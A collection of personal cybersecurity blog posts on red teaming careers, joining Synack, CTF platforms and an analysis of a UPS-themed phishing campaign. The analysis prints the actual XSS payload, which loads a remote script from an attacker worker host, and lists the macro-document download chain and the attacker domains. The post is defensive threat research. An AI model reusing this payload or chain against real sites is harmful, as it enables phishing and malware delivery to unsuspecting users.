If you're already in the cybersecurity field or looking to break in, you've probably noticed that the industry is constantly shifting. It's an endless game of cat and mouse between defenders and attackers. Many cybersecurity professionals start their journey as penetration testers (pentester), tasked with identifying vulnerabilities in networks, systems, or applications. But for those looking to move from finding holes in security to simulating real adversarial attacks, the jump to red teaming is a big one.

It's not just a “level up”, it's a mindset shift, a deeper technical dive, and a move into a role that looks at security from every angle.

Pentester vs. Red Teamer: What's the Difference?

As a Pentester, your main focus is on identifying vulnerabilities in a controlled, often isolated, environment. You typically work through a structured process, using a well defined methodology like OWASP for web applications or other vulnerability frameworks. The aim is to highlight weaknesses and deliver specific recommendations to improve security. This means pentesters are very methodical, targeting specific systems or applications for a focused assessment.

In contrast, a Red Teamer operates more like a real-world adversary. Instead of finding vulnerabilities, you're simulating actual attack scenarios to understand how far an attacker could get and how well an organisation can detect and respond. It's not just technical systems you're assessing, but there full defensive posture, including people, processes, and detection capabilities. Red teaming requires pentesting skills but adds in a whole other layer, you're emulating threats, using adversary tactics, and focusing on stealth to see if you can fly under the radar.

How a Pentester's Skillset Evolves for Red Teaming

May red teamers start with a strong penetration testing background, so the jump to red teaming builds on those foundational skills. Here's how key skills evolve from pentesting to red teaming:

1. Exploitation Techniques: Basic to Advanced

Pentester: As a pentester, you're comfortable with common exploitation techniques, usually leveraging tools like Metasploit or Burp Suite to uncover and exploit web or network vulnerabilities.

Red Teamer: In red teaming, the game changes. You're moving into more advanced exploitation, covering a wider range of systems and techniques. Tools like Cobalt Strike are essential, and you'll be simulating sophisticated attacks, including advanced payloads and lateral movement tactics to mimic high-level threats.

2. Command and Control (C2) Frameworks: Building Persistence

Pentester: In pentesting, persistence isn't always a priority. You find a vulnerability, exploit it, and report the results.

Red Teamer: Persistence is critical. You're establishing and maintaining C2 communications while evading detection, much like real-world attackers. Familiarity with frameworks like Mythic and Posh C2 enables you to test defenses and remain hidden, mimicking the stealth and persistence of sophisticated threat actors.

3. Adversary Emulation: Beyond Finding Vulnerabilities

Pentester: Your focus is on vulnerabilities - identifying and exploiting them in a technical, structured approach.

Red Teamer: Red teaming means stepping into an attacker's shoes. You're no longer just finding vulnerabilities, you're emulating the behavior of threat actors. Frameworks like MITRE ATT&CK become essential, letting you build scenarios that test the full extent of an organisation’s detection and response.

4. Social Engineering Techniques: Expanding the Attack Surface

Pentester: Pentesting is usually limited to technical testing and doesn't often include social engineering, though phishing simulations might sometimes be included.

Red Teamer: Red teaming takes on social engineering in full force. Phishing, pretexting, or even physical intrusion are tactics you'll employ, testing an organisation's human defenses along with its technical controls.

5. Reporting and Communication Skills: Tailoring the Message

Pentester: As a pentester, your reports focus on technical findings and remediation steps for each identified vulnerability. Clear communication is important but typically stays within technical teams.

Red Teamer: For a red teamer, reporting is more strategic and narrative-based. You're documenting attack paths, impact, and the organisation's response gaps. This means translating technical jargon into clear risks and actions for both technical and executive audiences, offering insights that help teams strengthen security holistically.

Soft Skills and Mindset: The Core of Red Teaming

For both roles, technical expertise is vital, but moving into red teaming means enhancing your soft skills too. Communication, collaboration, and a proactive, strategic mindset are key. Red teamers work closely with different stakeholders, often mentoring junior staff and contribute to broader security awareness. These skills are what help bridge the gap between finding vulnerabilities and building an organisation wide defensive posture.

From Pentester to Red Teamer: Embracing the Challenge

Transitioning from pentesting to red teaming is an exciting and challenging move that broadens your view of cyber security. By building on the technical skills of a pentester and developing a strategic, adversary-focused mindset, you're positioning yourself to make a real impact in an organisation's security. Red teaming isn't just a job, it's a commitment to pushing defenses to their limit and ensuring resilience against real world threats.

If you're ready to take on this challenge, embrace the complexity and step confidently into a role where you'll learn, adapt, and continuously test your mettle. The journey from pentester to red teamer is one of growth, resilience, and an ever-deepening understanding of security.

So dive in and start exploring, you're in for a rewarding, dynamic career that's anything but ordinary.

Because "Breaking into Cyber" is overrated. :)

Anyone with a LinkedIn profile and interested in the Cyber security industry would have come across a post with a statement such as 'How do I find an entry level role in Cyber security' and more often than not, the reply in the comments section is 'Cyber security is not and entry level job'. Some argue, that there are always ways to enter the industry such as undertaking an IT help desk job and others will say that there are entry-level roles, such as junior or apprentice (they're just few and far between). As someone who did neither, I thought I would share my own experience with landing that first role as a mid-level Penetration Tester in the industry.

My background has been very much learn what you can from where you can. This journey of self learning started from a very young age. Malcolm Gladwell said it takes 10,000 hours to learn a new skill, however recently Josh Kaufman disproved this theory stating that it takes 20 hours not 10,000. I am by no means saying you can learn cyber security in 20 hours maybe just not as much as 10,000. When someone asks me what is takes to land a job in cyber the answer is passion, (more passion, more energy) you may be rolling your eyes and thinking cliché but it's true. Cyber security no matter what the role, is a rabbit hole deeper than you can ever imagine. You have to have the passion and interest to engage in the subject and tumble down that rabbit hole faster than Alice.

Back in the early 2000s my teenage years were spent in my room on the computer but back then there weren't so many social media platforms like Twitter(X), Facebook, TikTok,  it was internet relay chat (IRC) and that's where I became interested in Cyber and the possibilities that it posed. Of course, at that age it's not the security side that interests you as the chat groups were commandeered by Black Hat hackers, in a way as a young teenager it was like being in a room full of grown-ups talking about things kids shouldn't hear, and I was there hiding in the darkness of the chatroom, invisible, listening.

That was where I learned about security vulnerabilities, what they were and how to exploit them which is what others seem to be doing and on a mass scale for fun at that. I also learned how to secure vulnerabilities as when a hacker got hold of a server, they wanted to secure it and protect it from other hackers, this double-sided sword taught me the basis and fundamentals of Cyber security just not in the traditional sense.

Growing up in Romania we didn't have access to as much as other Western Countries, so I spent most of my time online and for years that is what I did. I quickly learned various sides of Cyber security, my love for Linux terminals was set in stone. I travelled to several countries such as Spain, Greece, Germany where I resided for several years but wherever I went so did my computer (and internet connection however stable) enabling me to have one foot in the virtual world no matter where in the world I was.

You're always told that if you want a career you need an education. Be that in the form of a college Diploma or University Degree. I chose the latter. I will admit this is the only reason that I went to university was for a job. For me university wasn't stimulating as what we were being taught I already knew, I was for the most part going through the motions. My real cyber education was at home, doing what I did best, learning on my own.

Hungry in my quest for knowledge I was on every platform you could imagine. Try Hack Me wasn't as challenging so I tried Immersive Labs and then Hack the Box. This is where I obtained Guru level, top 10 UK and top 50 Worldwide. The novelty of solving challenges soon wore off and I was ready for experiencing real world vulnerabilities.

Vulnerability disclosure programs are fantastic, companies allow testers to test their web applications, external infrastructure and disclose anything they may find. I started doing disclosures for the top companies and organisations in the world, however it is very easy to step over the line and this can become problematic. You may ask yourself, why? Well, because it's very easy to step out of scope and wonder into areas that are not part of the vulnerability disclosure program.

I loved the real work experience and wanted to continue, and for that I joined Synack (SRT). I feel the combination of the three is what ultimately landed me my first role as a Cyber Security Consultant (Penetration Tester).

Try Hack Me paved the way for Hack The Box and Hack The Box helped with passing Synack's vetting process. Synack is where I gained some real world experience, In my opinion, some of the best penetration testers or red teamers come from a bug bounty and black hat background. This is because they have a different way of thinking. It takes a creative and infinitely curious mind to figure out new ways to break into a system, bypass security mechanisms, or use known vulnerabilities in novel ways. This is particularly true since the obvious ways into a system are undoubtedly blocked first.

While creativity is undeniably vital in hacking, it doesn't stand alone as the sole mental attribute ensuring success. In reality, there's a distinct trait that sets accomplished hackers apart from the less skilled.

That crucial attribute is systemising, or the ability to build systems and understand them. As per research in Frontiers in Human Neuroscience, a positive correlation exists between systemising and general hacking skills. This correlation frequently leads to a comprehensive grasp of systems extending beyond those confined to computers. For hackers, mastering this trait is of paramount importance.

Synack and other bug bounty platforms can enable you to test your skills on real world organisations and gain experience. I spent a month getting used to their processes and submitted several vulnerabilities for which I got paid almost instantly. Going through this process also taught me the importance of staying within the scope of a program to precision and writing high quality reports showing the risks posed to the organisation. I would also say that writing blogs helped, this may seem insignificant, but blogs are becoming more like portfolios of work rather than Dear Deirdre. When you have to explain to an audience you have to know the ins and outs of the subject to a high level. This became home to all the vulnerability disclosures I completed and articles relating to interesting finds. I often notice job seekers struggle to land a job in Cybersecurity because they don't have experience. You just have to find your own way to showcase your skills to a potential employer and by this increase your chances of getting employed.

Believe it or not this article was meant to be about my first two years as a Consultant in Cyber Security (Penetration tester), but as you have read it turned out more about my journey and landing a full-time Cybersecurity Consultant job with no prior experience or certificates other than what I've discussed above.

Last words of wisdom, please don't set up your LinkedIn profile the day after you graduate. Network, share your knowledge, and so on – long before you're ready to look for a job.

Have you got any suggestions or questions for me ? Get in touch!

Thanks for reading my article, until next time!

Your friendly neighbourhood Hacker.

I've glad to share that I am finally a member of Synack Red Team. My actual offical joining date is 26/8/2021. It was a long process but very satisfying in the end. Tune in if you would like to know more about the journey!

Theodore Roosevelt: Nothing worth having comes easy.

This article is not sponsored by Synack or HackTheBox.

Introduction

Bug bounty programs were created 10-15 years ago by companies like Google, Mozilla, Facebook, they were basically created to help them uncover the security vulnerabilities that would ultimately lead to a major data breach. They opened up their environments to the world and said: "If you are able to find a vulnerability in one of our environments we will pay you, and we will pay you based on the impact and severity of that vulnerability."

About Synack

As Jay Kaplan Cofounder & CEO Synack said "Synack is the company that the world's largest corporations and government agencies turn to read their applications and networks of critical vulnerabilities, their customers range from the largest global 2000 companies, the world's leading banks, retailers, and health care organisations, they represent over a trillion dollars in assets, as well major federal agencies including the dept. of defence, dept. of energy, health and human services, they work with 18 different federal agencies today. They leverage a network of over 1500 of the most elite ethical hackers from 82 countries who are on the hunt for potential fatal vulnerabilities while utilising technology to make those hackers smarter and infinitely more skillable.

The word hacker [ hak-er ] traditionally has carried a pretty negative connotation and generally think of a hacker as a person wearing a hoodie, sitting in their parents dark basement and hacking by night and sleeping during the day. The reality is most of these really good hackers are true professional, they have normal 9 to 5 jobs working at some of the biggest companies in the world. The way we perceive them vs the way the look in reality is sometimes different.

There are several hackers that have passed a million dollar mark with Synack in terms of total money taking home over the past several years, so the ability to earn a substantial amount of money is real. Some hackers may earn several hundred dollars for finding low hanging fruit vulnerabilities or even completing "a mission"; is what they call at Synack, which is a task set up by Synack for researchers then they pick the mission, once completed they will be paid for it.

An example of a mission: It could be looking for Cross site scripting within the scope that they provide.

They will pay based on the category of the issue that the researcher finds, and the data that is ultimately exposed, all of that is fed into a calculation to determinate how much to pay the security researcher. Some people have shifted from their normal daily jobs to work full time on Synack.

Synack is kind of the Uber for Cyber Security with a lot more security controls in place, they aren't about big numbers of researchers, they are about the best of the best that's why they have a 10% acceptance rate of who they take into their community. They are really focus on people who are productive, they actively manage their community and make sure that those who are working with them are productively finding vulnerabilities and providing vulnerabilities to their customers."

SRT Member's Statements

Jennifer Villareal Ethical Hacker at Synack said "If you are a person who would rather not sit around and watch movies, if you'd rather be participating in something puzzle-like, and learning something that can make you money. People's privacy and national security may also be good motivation."

Jonnathan Villareal Ethical Hacker at Synack said "It's the coolest thing to ever to hack and get paid for it, and of course not going to jail is a huge plus too.
The satisfaction of knowing that you contributed to make something secure, if you can't break it and some of the best hackers can't break it today, means that people relying on these services can use them reliability and securely and there is a bit of pride to that as well."

Cyber criminals are hiding hard during the Covid19 pandemic and the crowdsource security testing model is essential for helping these organisation defend themselves especially when traditional security teams can't even get into the office.

Cyber Security is one of these industries where companies have been very sensitive and been against the idea of remote work but obviously that is changing in big way today.

Right now companies are trying to push new environments, new applications, new websites as fast as they can so they need a solution that allows them to thoroughly test these environments in a highly rapid manner.

How Synack gets the world best ethical hackers

Earning a spot on the Synack Red Team (SRT) is a pinnacle achievement in the career of the world's best security researchers, Synack has the most strict entrance criteria in the industry. Synack keep average hackers Out, even many above hackers won't make it to the SRT, uniquely Synack regularly removes SRT members each year, companies aren't exposed to ineffective testers protecting them in ways bug bounty platforms don't. This way their customers get the best of the best. The SRT members are incentivised to find unknown, high severity vulnerabilities in their customer's systems before these vulns will cause problems for the business. The SRT use Synack's platform to narrow in on critical vulnerabilities other solutions struggled to find, with Synack's proprietary scanning technology they can be more efficient than unassisted hackers seeking bug bounties on other platforms. Synack testing is also safer for companies with constant measurement, analytics and monitoring. Synack motivate the SRT members to do the best hacking including a Hall of Honour, The "Synack Acropolis", they continue to motivate the SRT as they climb the ranks. And finally to attract there are opportunities to travel, adventure and hack for Synack at destination events - all to protect their customers around the world.

About the Journey

Entry Point 1

There are two main ways to join the SRT, one of which is through their main website and through hackthebox tracks. The power behind the Synack platform is an elite team of the world's top cybersecurity researchers—drawn from over 80 countries, recruited for their skill, and chosen based on trust.  (Apply). You will have to fill a form with as much information to show Synack your worth, this includes:

Bug bounty experience (public / private) must list any public profile links
Job descriptions with detailed responsibilities
Relevant industry certifications
Industry/conference speaking experience
Any attributed CVEs

Tip: Do you have a friend who is actively hunting on the platform? perhaps they could refer you? this may help with your application.

RED TEAM RESEARCHER REQUIREMENTS CROWDSOURCED

PENETRATION TESTING: RESEARCHER TRUST AND SKILL

Synack Red Team (SRT) researchers must pass through a rigorous vetting process that includes five intensive vetting stages. SRT applicants must pass through all stages before being fully onboarded; this ensures that researchers are both technically qualified and trustworthy. Synack’s vetting process eliminates the majority of applicants with only ~10% fully passing through to the final on-boarding stage.

Synack Red Team Vetting Process

FRONT-END SCREENING: APPLICATION REVIEW

VETTING STAGES: APPLICATION, RESUME REVIEW AND INTERVIEW

Following an initial triage of applications, qualified candidates undergo a behavioural interview. Behavioural interviews are performed in-person or via video by trained and designated members of Synack’s Researcher Onboarding Team (ROT) to assess the candidate’s integrity and suitability for membership. During the interview, the ROT will establish a score for the candidate’s threshold for ethics, learn about candidate motivations and goals, and communicate Synack’s stringent requirements and expectations.

SKILL ASSESSMENT

VETTING STAGE: SKILLS TEST AND ASSESSMENT

Synack’s assurance that only qualified researchers will engage with client assets is enabled by our skill assessment program. Consisting of a written and practical application component, each skill assessment is specific to a technical domain, such as web or mobile application or host-based testing. To ensure fidelity, skill assessments are internally created, maintained and administered. Written and practical components may be taken only once, and must be completed in a single session.

TRUST ASSESSMENT

VETTING STAGES: BACKGROUND & ID CHECKS, ACCEPTANCE & MONITORING

Prior to onboarding, all researchers undergo a mandatory trust assessment consisting of background and identity verification and the following mandatory criminal background checks:

• Global terrorism and sanctions list search

• County criminal record history search (7-year)

• Department of Justice sex offender records search

• Federal Excluded Parties Listing System search A Social Security Number trace, including address history cross-referencing1 Once the researcher is admitted to the platform, they undergo a 45-day monitored qualifying period before being fully accepted into our program.

3.1 DoJ sex offender records search and Social Security Number trace are conducted for domestic candidates only.

What are the challenges?

You will typically be given up to 20 challenges that involve most common modern vulnerabilities being exploited in the wild. For confidentiality reasons I cannot go into this subject as much as I'd like to.

Once you complete your preferred route, you'll e-mail them and they will get back to you.

Aside proving your technical ability all the stages are just as important. You may have noticed Synack is very careful when picking their members.

Heads Up: You cannot collaborate with anyone on this, you cannot ask hints online. If you plan to cheat, then how will you be able to find vulnerabilities on the platform? After all, this is a job interview and if found in wrong you will definitely not proceed.

Entry Point 2

HACK THE BOX - (Method A and Method B).

Method A: Offshore

WHAT IS OFFSHORE?

Assess, Gain, Pivot. Real-World Active Directory Simulation!

Offshore Pro Lab is an Active Directory lab that simulates the look and feel of a real-world corporate network. You are an agent tasked with exposing money laundering operations in an offshore international bank. As a real-world penetration tester, you need to assess the external perimeter, gain an internal foothold and pivot across multiple hosts and forests.
Users start from an external perspective and have to penetrate the "DMZ" and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab. To track progress, there are multiple flags planted along the way as well as a few side challenges not required to advance within the Active Directory environment. Players can submit flags to earn a place in the Offshore Hall of Fame and receive badges for various stages of completion.

Who is Offshore for?

Offshore Pro Lab has been designed to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned cybersecurity professionals as well as InfoSec hobbyists and even blue teamers; there is something for everyone. Players will pick up multiple new tricks and hacks, which can be immediately applied to real-world engagements or taken back to their organizations to help improve the overall security posture.

SKILLS / KNOWLEDGE

• Familiarity with modern tools and techniques used to perform Penetration Testing engagements
• Working knowledge of Networking and Web Application Attacks
• Working knowledge of Linux and Windows Operating Systems and Active Directory

ATTITUDE / MENTALITY

• Patience and perseverance
• Willingness to do extensive research
• Accept that you might fail more times than you will succeed; it's part of the process

What will you gain?

Are ready to develop and enhance your skills in network penetration testing?

Players will gain the opportunity to attack 17 hosts of various operating system types and versions to obtain 30 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. Some of the Red Team TTPs (Tools, Techniques, Procedures) players will learn include:

• Web Application Attacks
• Enumeration
• Exploiting Obscure and Real-World Active Directory Flaws
• Local Privilege Escalation
• Lateral Movement and Crossing Trust Boundaries
• Evading Endpoint Protections
• Reverse Engineering
• Out-Of-The-Box Thinking

Offshore Lab is not free, players that have completed Offshore will own a certificate of completion provided by Hack The Box.

All Hack The Box players that successfully complete (100%) Offshore Pro Lab [Penetration Tester Level II] get one step closer to joining the Synack Red Team. All you need to do is complete Offshore within this timeframe and send an email to support@synack.com with the subject "Offshore Completed" including your official HTB certificate of completion.

Method B: Synack Red Team Track

A great way to fast-track your application to join SRT through Hack The Box, the Synack Red Team Track!

Have you discovered our newly announced Tracks? If not, let’s cut straight to the chase and explore Hack The Box Tracks on the new platform.

One of them is the Synack Track, including 7 HTB Machines and 7 HTB Challenges. Create beautiful exploit chains, master some of the most interesting web vulnerabilities, and prove your prowess in the specially curated Synack Red Team Track.

Due to some machines being retired that are part of the track, you will need a VIP subscription to be able to spawn these boxes.

As Ryan Rutan, Director of Community at Synack said "We are very excited about this joint effort with Hack The Box as it will help many up and coming security professionals test their talents as a potential member of the Synack Red Team.

As a valued Hack The Box user, you have had the opportunity to test and improve your cyber security skills using the HTB training platform. Given your track record, we feel you have demonstrated the skills needed on the Synack Red Team to provide crowdsourced security testing.

Synack responsibly grows the SRT proportional to the opportunities that are available to the community. This ensures both an equitable, yet competitive, landscape that strives above all else to be fair and respectful to each SRT such that they can hack, learn and grow as security professionals. Synack leverages an application waitlist to ensure that growth is always strategically aligned in this regard."

Conclusion

I have been super excited to explore the platform, complete a few missions, find a few bugs, learn along the way and level UP!

So far I am just beginning to get used of how things are getting done, but see a print of my current stats.

If you decide this is for you, I wish you all the best on your journey! don't get demotivated if somebody says you can't do it. Instead accept it as a challenge, give your best, work hard and prove your worth.

Sources:
Synack Requirements
HackTheBox Tracks

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

Let's talk about one of the most creative phishing campaigns I have ever seen to date. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain: Combining multiple vulnerabilities into a chain of attack that ends with the attacker in a privileged position on the targeted system.

Since Covid19 began, the deliveries have surged drastically. Either for grocery shopping or something you have ordered, we all receive many parcels from various couriers. It is more common than before to receive text or e-mail notifications regarding status updates for your delivery. This could turn out badly with high chances of being Phished especially if you are already waiting on a delivery.

This phishing campaign is the most realistic because it leveraged a Cross-Site Scripting (XSS) vulnerability that existed in one of the courier's websites (UPS). In this case, this has enabled attackers to modify the page contents and turning it into a legitimate download page by injecting malicious HTML and JavaScript code.

This vulnerability allowed the attacker to distribute a weaponised document (docm) through a remote CloudFlare worker but make it appear as though it was being downloaded directly from UPS.com.

When the document is downloaded and enabled, the macros will attempt to retrieve the next payload hosted on a 2ne domain controlled by the threat actor. At this stage it is uncertain what the final payload is supposed to do. The sky is the limit - Ransomware? Spyware? Botnet? We'll see.

The phishing campaign was first discovered on Aug 23, 2021, by security research Daniel Gallagher.

Dissecting the UPS phishing scam

Screenshots of the e-mail:

This is a decent attempt 1:1 for the template! No spelling mistakes or weird hidden Click here URLs. Going back to my title and explain why I said "Almost". This is because the email senders were not very convincing however good enough to pass SPF and DKIM protection, moreover because it leveraged XSS it did not break TLS validation: unitedparacelservice@paradanta.com As per Daniel's screenshots, however, I found another attempt coming from unitedparcelservice@tvamberg.de. The email sender is always the same one "unitedparcelservice" and the domains were random, safe to assume since both are using WordPress as the main content management system and perhaps were using weak passwords or out of date build/plugins they were hacked and that allowed the attacker to send bulk e-mails from their servers.
The tracking number is the vulnerable XSS URL on UPS.com website. This downloads a malicious document, pretending to be an invoice.
Let's have a look at the URL in question.

The email headers:

Sending address: unitedparcelservice @ paradanta[.]com
SMTP server: 212.227.126[.]134 / mout.kundenserver[.]de

Url Encoded:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&loc=en_US%22%3E%3Cimg%20src%3D%22x%22%20onerror%3D%22Function%28atob%28%27JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ%3D%3D%27%29%29%28%29

Url Decoded:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&loc=en_US"><img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

Tidying up more:
https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&service=standard_delivery&xref=useless&loc=en_US"><img src="x" onerror="Function(atob('$.getScript('https://m.media-amazon.workers.dev/js')'))()

Another base64 encoded string in the xref parameter that decodes to: 1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;).

Super interesting, the threat actor was kind and left a comment in the base64 string that explains this string's purpose, which is to hide the query parameter that is appended at the end of the URL. Because the URL is so long the browsers will not show all of the URL and since the malicious XSS injection is at the end of the URL we can't see it.

XSS payload is executed right after the loc parameter and is: <img src="x" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

And yet another base64 string that decodes to $.getScript('https://m.media-amazon.workers.dev/js') this is the worker script that gets loaded in the page UPS page. <img src> XSS payload is quite common so nothing fancy there, atob() function decodes a string of data that has been encoded using Base64 encoding. This function is commonly used to steal cookies, bypass black-lists and typically for blind XSS injections.

The above script will modify the UPS page to display a message that a file will be downloaded.

This approach is truly what makes this campaign stand out. Victims of this campaign might be tricked in opening the invoice with less suspicion, thinking it is a genuine file from UPS.

The mysterious fake 'Invoice' document

From the above worker script, there is another URL in the parameter named downloadUrl, this was available at https://m.media-amazon.workers[.]dev/documents/invoice_1Z7301XR1412220178

The downloaded document is named 'invoice_1Z7301XR1412220178.docm' and claims to be a shipping invoice from UPS. Attention to the extension '.docm'. The macro names were "Hehehe" and "hahahah".

DOCM files are Microsoft Word 2007 or higher generated documents with the ability to run macros. It is similar to the DOCX file format but the ability to run macros makes it different from DOCX. Like DOCX, DOCM files can be store text, images, tables, shapes, charts and other contents. The capability to run macros make it easy to save time by executing the series of commands in the form of recorded actions for the automatic completion of a task. DOCM files can be opened and edited in Microsoft Word 2007 and above.

Once enabled, the macros within the document will attempt to download another file that was located at https://divine-bar-3d75.visual-candy.workers[.]dev/blackhole.png.

This appears to be an image file, but is it?
This file was disguised as a picture (png format) and it's the first payload to be downloaded. It is very common for advanced threat actors to split their payloads in smaller chunks to avoid downloading large files, they also use random timeouts between downloading and execution of these scripts. This helps in avoiding detection by antiviruses. Typically you see an obfuscated PowerShell script that retrieves more files that make up to a final payload.

After some more digging, I stumbled on another CloudFlare domain that hosts more instructions to be executed on the victim's machine This was available at: https://cdn.globalsigncdn.workers[.]dev

This sample contains so many TTPs: - Normal.dotm (persistence) - Run key to launch Normal.dotm via PS (persistence) by winword - Task scheduler to launch PS by winword - WMI Persistence, COM hijack and UAC bypass via SilentCleanup task. The final payloads "appears" to be linked to xmrig and its purpose is used for Cryptojacking.

Cryptojacking is a slow and tedious way to generate illicit income, that’s why the actor is using botnet to infect as many devices as possible. Owning multiple systems for mining is not cheap, so attackers try the next best thing: To remotely compromise devices and use them for mining instead.

XMRig is a miner specifically, a type of threat used to make money at the expense of computer users by using the infected computer users to mine Monero, a cryptocurrency. XMRig can cause a computer to overheat and perform badly. Since XMRig uses additional system resources, taking these away from the victim.

We can see they are using RandomX algorithm.

RandomX is the name of the new mining algorithm for Monero, the privacy coin whose objective is to keep the network protected from ASIC mining, allowing only mining per CPU.

Conclusion

This phishing campaign illustrates the creativity and evolving techniques used by threat actors to distribute weaponised files convincingly.

While the E-Mail sender was a suspicious domain, the XSS vulnerability was actively exploited to make to appear as invoiced were legitimately downloaded from UPS, many people would have fallen for this scam. But did they?

That's a story for another article, perhaps if I can find where the mining workers are connecting and monitor that mining pool, I could come back with some statistics e.g. infection rate, money generated, time frame for this campaign. Game on!

I don't believe this to be APT gang however the chaining of vulnerabilities from an offensive security perspective was pretty ingenious.

I will continue digging for more information to find the source of this attack, if I find anything new I will update my blog post.
The UPS.com Cross-Site Scripting vulnerability has since been fixed.

Hash1: 841e6458ddc277a1ffdec7907b3e0be029dbe57af88fb11fcceb23f988cf7432

Hash2: ae1123c24bb52dce5ec0f0a6c947785012702dc7c3339188baee917721351ff5

Main hosts: cdn.globalsigncdn.workers[.]dev
divine-bar-3d75.visual-candy.workers[.]dev
m.media-amazon.workers[.]dev

References:

Virus Total Scan

INVOICE_1Z7301XR1412220178.docm (MD5: 8EC2C162D57A426A32E27745D9854F93) - Interactive analysis - ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

divine-bar-3d75.visual-candy.workers.dev - urlscan.io

urlscan.io - Website scanner for suspicious and malicious URLs

urlscan.io urlscan.iourlscan.io

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

Very recently, I participated in a CTF. While I was still in the zone, I came across an interesting post on LinkedIn that said What does it take to be a web application security consultant?

The author was Marcus Pinto, Owner of MDSec, a security consulting and education company with expertise that is backed by the Web and Mobile Application Hackers Handbook series.

The post stated that if you want to see what it takes to be a web application security consultant, check out the free training platform. To join, the applicant would send an e-mail to contact@mdsec.co.uk and request an account on the free CTF portal. They stated that if you knock down all the challenges expect a call (perfect for job seekers!).

This got me intrigued. What does a CTF set up by a top security company look like?

Sent an e-mail and asked for access, got an e-mail back very promptly with the account details and a few instructions.

Content:

The content here will give you insight into:

• Uncovering subtle flaws in applications
• Expanding your armory of tools and techniques
• Writing custom code (burp extensions
• Practicing key vulnerabilities

Prerequisite Knowledge:

It is assumed that you have a working knowledge of:

• Burp Proxy, Intruder, Repeater, Scanner
• At least one programming language (python etc.)
• HTML
• Basic understanding of SSL
• HTTP
• JavaScript
• The OWASP Top 10
• XSS, SQLi, Traversal

The starting point is the challenges in the interview section. The difficulty ranges from low to hard. There is no requirement to connect to a private network, although Burp or Owasp ZAP will be needed later. Each challenge has an introductory description and sometimes even a hint to help you get started.

My aim is to share this great opportunity with those looking for a job within the UK. It is also great for those who like a challenge and hands-on practice.

MDSec also offers the following training:

• Adversary Simulation and Red Team Tactics
• Beyond the Web Application Hackers Handbook (Advanced)
• The Mobile Application Hackers Handbook, Live Edition
• The Web Application Hackers Handbook, Live Edition (Beginner Course)

I am not affiliated or being paid to advertise the above courses. If you like or could not solve the challenges, you can sign up for the (Advanced) course (in this case). This will teach you the methodology you need to solve them.

Conclusions

So what does it take to be a web application security consultant?

For some companies it takes a Cyber Security degree, and for some it could be as little as solving web app challenges as proof of your skill.

Application security is fast becoming the most challenging aspect of information technology. Not surprisingly, it drives demand for highly skilled consultants.

Top Required Skills for a Security Consultant

Students planning to become security consultants should learn hard skills such as computer programming, network, and security configuration. Taking courses like cloud computing infrastructure and services, network and security foundations, will prepare you to understand the complicated technical aspects of security consulting.

Though it's natural to gravitate towards certain soft skills over others, students can highly strengthen areas such as communication, problem-solving, and leadership skills by obtaining a degree. Courses in critical thinking and logic, communication, and managing IT can prepare you for leadership in the field.

Security consultants need to engage in critical thinking to analyse security issues and respond quickly to breaches—or even better, find problems before they arise. Communication is also very essential, as they must communicate with top executives about the company's security operations, outlining issues so that managers can both understand and make informed decisions. Security consultants may need to communicate via written reports or through oral presentations, and they may also be called upon to tutor non-IT staff in best practices.

Security consultants who develop leadership skills and strong management techniques can advance to oversee entire departments and projects. Many companies employ teams of IT personnel, which good managers can lead to implement and maintain their cybersecurity protocols.

About MDSec's Web Challenges

I thoroughly enjoyed the challenges so far. You can see I still have one challenge left to complete from the Interview section.

You can probably imagine a few of the challenges take time to figure out. Especially the challenges that you have not encountered before. There are nine more labs to which I do not have access yet, but I assume each lab will be unlocked after I complete the Interview section.

The exercises were very realistic to what kind of vulnerabilities are hiding in modern web applications. I like Web testing, but there is so much to it. The best approach, in my opinion, is practicing; you will get a lot of exposure and gain knowledge with a hands-on approach from different sources.

There are a lot of platforms paid and free to practice and, by sticking to just one or two, in my opinion, you limit yourself. Explore and find different avenues every time an opportunity is presented.

PS: Don't ask Marcus for hints! You won't get any. 😇

Have you got any suggestions or questions for me ? Get in touch!

Thank you for reading my article, Until next time!

Your friendly neighbourhood Hacker.

"Life is not a problem to be solved, but a reality to be experienced." Soren Kierkegaard

Welcome! I'm glad you're here. We need more people like you.

This blog will be about the LTDH21 annual flagship event organised by ENUSEC - a student society interested in all aspects of security based in Edinburgh. This is not a walkthrough although I plan to cover a few challenges that we solved in a future blog post.

If you're planning to make a living in defense, you have to think like the offense.

Participate and learn to win in Capture the Flag (CTF). These types of competitions are based on disciplines of professional computer security into short objective and quantifiable exercises. The main focus area for CTF competitions is to measure the vulnerability discovery, exploit development, toolkit creating, and operational tradecraft.

Whether you want to succeed at CTFs or in a computer security professional job, you'll need to become an expert in at least one of these disciplines. Ideally as many as possible.

